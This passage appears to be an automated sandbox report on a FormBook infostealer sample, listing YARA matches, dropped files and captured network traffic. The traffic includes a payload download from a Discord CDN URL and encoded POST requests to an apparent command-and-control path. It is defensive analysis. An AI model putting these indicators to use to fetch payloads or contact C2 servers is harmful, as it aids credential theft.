32 55 4f 47 4b 65 32 42 4b 52 44 32 37 35 33 78 44 53 71 7a 28 51 45 56 69 32 32 41 78 66 4b 4e 79 6b 4d 66 41 78 4d 41 77 78 7a 34 58 49 63 6d 42 53 39 69 32 4d 28 5a 65 66 35 2d 75 43 39 4c 63 4d 6c 6e 39 39 77 2d 31 4f 52 4c 47 65 56 6c 43 77 47 32 34 5a 66 6c 56 32 69 55 4e 34 6c 59 75 65 58 70 72 77 6b 47 49 56 42 6e 4f 52 47 34 50 51 62 49 41 74 4d 4f 48 74 5a 41 62 75 77 38 34 46 55 67 64 59 66 31 6d 32 48 38 65 5f 37 56 78 79 70 36 63 4b 41 44 65 4d 61 37 70 61 45 32 4e 75 68 75 30 77 77 4e 30 7a 4c 74 51 2d 42 6a 62 41 4b 70 73 45 4f 43 48 73 70 76 77 43 79 66 47 74 4a 39 75 61 57 56 30 77 51 4e 51 59 39 46 6a 61 43 43 51 4b 46 5a 72 6f 6f 31 41 4a 36 75 76 46 38 48 58 76 78 41 67 53 68 51 39 63 71 55 31 52 59 6f 73 38 68 63 7e 4f 51 6e 63 4f 76 44 4f 46 6f 6f 74 53 28 7a 5a 4d 64 42 78 30 57 2d 56 69 4c 78 37 51 69 58 63 58 46 63 48 56 63 44 72 41 42 66 50 76 4a 53 43 58 39 6a 47 32 53 56 4d 58 71 66 4c 61 63 47 44 6d 6a 4c 74 70 7a 65 32 63 59 52 71 6f 70 31 41 6a 68 66 63 79 69 5f 70 55 4c 4c 58 76 44 66 63 38 43 61 62 57 47 66 65
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 13 Jan 2022 19:23:52 GMTContent-Type: text/htmlContent-Length: 275ETag: "6192576d-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
                Source: WZ454554.exe, 00000002.00000003.285422442.0000000000878000.00000004.00000001.sdmp, WZ454554.exe, 00000002.00000003.285452298.0000000000878000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: help.exe, 00000014.00000002.560892253.0000000003929000.00000004.00020000.sdmpString found in binary or memory: http://www.sentlogisticsja.com
                Source: help.exe, 00000014.00000002.560892253.0000000003929000.00000004.00020000.sdmpString found in binary or memory: http://www.sentlogisticsja.com/m9g2/
                Source: unknownHTTP traffic detected: POST /m9g2/ HTTP/1.1Host: www.sentlogisticsja.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.sentlogisticsja.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.sentlogisticsja.com/m9g2/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 47 76 57 3d 6b 52 31 2d 31 57 32 49 66 69 6b 71 56 31 57 2d 65 70 48 42 74 33 28 62 72 55 7a 4b 55 37 33 73 55 55 72 5a 7a 31 55 56 52 74 43 71 61 41 53 53 76 4c 49 55 4f 46 51 61 65 42 4e 34 4d 68 41 52 73 4f 41 4e 32 5a 52 39 72 4c 6a 76 46 4f 65 52 46 6a 6b 6a 32 5f 78 41 44 55 76 5f 67 61 55 64 54 64 53 59 47 77 28 45 41 42 54 74 71 33 73 61 48 7a 5a 54 36 72 5a 53 47 39 4f 6f 6e 51 71 68 52 73 7e 70 63 52 32 34 57 62 6b 79 70 30 32 75 31 4a 4b 49 48 32 47 75 49 6d 5a 42 45 49 42 74 61 79 54 46 49 6a 33 63 31 39 44 6a 6c 72 69 58 6e 45 52 30 61 62 48 7a 61 32 4a 42 79 74 59 6b 4b 6a 50 4c 66 5a 50 74 35 68 79 6a 51 47 32 62 32 64 61 66 6f 49 51 65 4a 4c 59 4e 28 71 59 6b 47 6a 77 35 49 54 4c 4d 51 6f 68 35 4d 77 72 4e 42 63 6b 72 6d 49 34 4c 4e 6c 7e 59 6e 59 6d 34 6c 7a 58 43 6e 37 38 4b 28 36 54 5a 49 30 76 32 5a 74 47 5a 70 67 72 2d 32 38 57 6a 77 61 77 68 50 35 6c 4e 45 6f 42 6b 36 50 4c 78 66 6c 62 49 37 4a 38 73 39 2d 63 6e 51 77 32 53 69 4f 64 59 46 77 28 45 4c 4e 48 75 57 51 45 34 62 69 4d 5a 46 77 54 7a 52 73 4f 52 73 75 76 4a 28 7a 78 46 4d 48 64 37 34 75 39 6c 6c 32 4f 66 71 44 59 78 4b 64 57 51 45 68 30 4a 6e 42 4a 63 69 70 4e 4f 78 37 4d 41 28 71 41 42 49 78 76 76 72 49 6b 4e 6c 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: GvW=kR1-1W2IfikqV1W-epHBt3(brUzKU73sUUrZz1UVRtCqaASSvLIUOFQaeBN4MhARsOAN2ZR9rLjvFOeRFjkj2_xADUv_gaUdTdSYGw(EABTtq3saHzZT6rZSG9OonQqhRs~pcR24Wbkyp02u1JKIH2GuImZBEIBtayTFIj3c19DjlriXnER0abHza2JBytYkKjPLfZPt5hyjQG2b2dafoIQeJLYN(qYkGjw5ITLMQoh5MwrNBckrmI4LNl~YnYm4lzXCn78K(6TZI0v2ZtGZpgr-28WjwawhP5lNEoBk6PLxflbI7J8s9-cnQw2SiOdYFw(ELNHuWQE4biMZFwTzRsORsuvJ(zxFMHd74u9ll2OfqDYxKdWQEh0JnBJcipNOx7MA(qABIxvvrIkNlQ).
                Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
                Source: global trafficHTTP traffic detected: GET /attachments/801846679439016010/931166967853875200/Hyrzbcwcasllzbwmlqsydewtjitxnzf HTTP/1.1User-Agent: lValiHost: cdn.discordapp.com
                Source: global trafficHTTP traffic detected: GET /attachments/801846679439016010/931166967853875200/Hyrzbcwcasllzbwmlqsydewtjitxnzf HTTP/1.1User-Agent: 97Host: cdn.discordapp.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /attachments/801846679439016010/931166967853875200/Hyrzbcwcasllzbwmlqsydewtjitxnzf HTTP/1.1User-Agent: 11Host: cdn.discordapp.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /attachments/801846679439016010/931166967853875200/Hyrzbcwcasllzbwmlqsydewtjitxnzf HTTP/1.1User-Agent: 85Host: cdn.discordapp.comCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /m9g2/?xXV=6l9PRhy0D4S&GvW=sz5ErymDSipaI2rGHMiHzQDn8335WrDZWT7fmGUTYuWWeT2KiLBKARdoGEtcQCocu9tS HTTP/1.1Host: www.sentlogisticsja.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49746 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49750 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49751 version: TLS 1.2

                E-Banking Fraud:

                barindex
                Yara detected FormBookShow sources
                Source: Yara matchFile source: 21.1.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.WZ454554.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.1.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.0.WZ454554.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.1.WZ454554.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.1.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.1.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.0.Hyrzbcwcas.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.2.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.0.Hyrzbcwcas.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.WZ454554.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.0.WZ454554.exe.400000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.1.WZ454554.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.0.Hyrzbcwcas.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 21.0.Hyrzbcwcas.exe.400000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000000.360550532.00000000100E2000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.559491799.00000000030A0000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.556874060.0000000002B10000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.407793404.00000000005E0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000000.418862410.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.428947591.00000000005A0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.436930793.00000000008F0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000000.419325156.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000000.324007988.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000000.399621636.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.436845866.00000000008C0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000001.400349591.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000001.324511598.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.436315053.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000000.400048444.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.407725220.00000000005B0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.429108861.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001C.00000002.437292259.0000000002AD0000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.559355148.0000000003070000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000001.419503342.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000000.324380363.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000019.00000002.431106841.0000000003000000.00000040.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.428671777.0000000000400000.00000040.00000001.sdmp, type: MEMORY

                System Summary:

                barindex
                Detected FormBook malwareShow sources
                Source: C:\Windows\SysWOW64\help.exeDropped file: C:\Users\user\AppData\Roaming\75A8527W\75Alogri.iniJump to dropped file
                Source: C:\Windows\SysWOW64\help.exeDropped file: C:\Users\user\AppData\Roaming\75A8527W\75Alogrv.iniJump to dropped file
                Malicious sample detected (through community Yara rule)Show sources
                Source: 21.1.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 21.1.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 17.2.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 17.2.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 9.2.WZ454554.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 9.2.WZ454554.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 21.1.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 21.1.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 9.0.WZ454554.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 9.0.WZ454554.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 9.1.WZ454554.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 9.1.WZ454554.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 17.1.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 17.1.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 17.1.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 17.1.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 21.2.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 21.2.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 21.0.Hyrzbcwcas.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 21.0.Hyrzbcwcas.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 21.2.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 21.2.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 17.0.Hyrzbcwcas.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 17.0.Hyrzbcwcas.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 9.2.WZ454554.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 9.2.WZ454554.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 17.2.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 17.2.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 9.0.WZ454554.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 9.0.WZ454554.exe.400000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 9.1.WZ454554.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 9.1.WZ454554.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 17.0.Hyrzbcwcas.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 17.0.Hyrzbcwcas.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 21.0.Hyrzbcwcas.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 21.0.Hyrzbcwcas.exe.400000.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 0000000A.00000000.360550532.00000000100E2000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 0000000A.00000000.360550532.00000000100E2000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000014.00000002.559491799.00000000030A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000014.00000002.559491799.00000000030A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000014.00000002.556874060.0000000002B10000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000014.00000002.556874060.0000000002B10000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000009.00000002.407793404.00000000005E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000009.00000002.407793404.00000000005E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000015.00000000.418862410.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000015.00000000.418862410.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000011.00000002.428947591.00000000005A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000011.00000002.428947591.00000000005A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000015.00000002.436930793.00000000008F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000015.00000002.436930793.00000000008F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000015.00000000.419325156.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000015.00000000.419325156.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000009.00000000.324007988.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000009.00000000.324007988.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000011.00000000.399621636.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000011.00000000.399621636.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000015.00000002.436845866.00000000008C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000015.00000002.436845866.00000000008C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000011.00000001.400349591.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000011.00000001.400349591.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000009.00000001.324511598.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000009.00000001.324511598.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000015.00000002.436315053.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000015.00000002.436315053.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000011.00000000.400048444.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000011.00000000.400048444.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000009.00000002.407725220.00000000005B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000009.00000002.407725220.00000000005B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000011.00000002.429108861.00000000005D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000011.00000002.429108861.00000000005D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 0000001C.00000002.437292259.0000000002AD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 0000001C.00000002.437292259.0000000002AD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000014.00000002.559355148.0000000003070000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000014.00000002.559355148.0000000003070000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000015.00000001.419503342.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000015.00000001.419503342.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000009.00000000.324380363.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000009.00000000.324380363.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000019.00000002.431106841.0000000003000000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000019.00000002.431106841.0000000003000000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: 00000011.00000002.428671777.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
                Source: 00000011.00000002.428671777.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
                Source: WZ454554.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                Source: 21.1.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
                Source: 21.1.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
                Source: 17.2.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
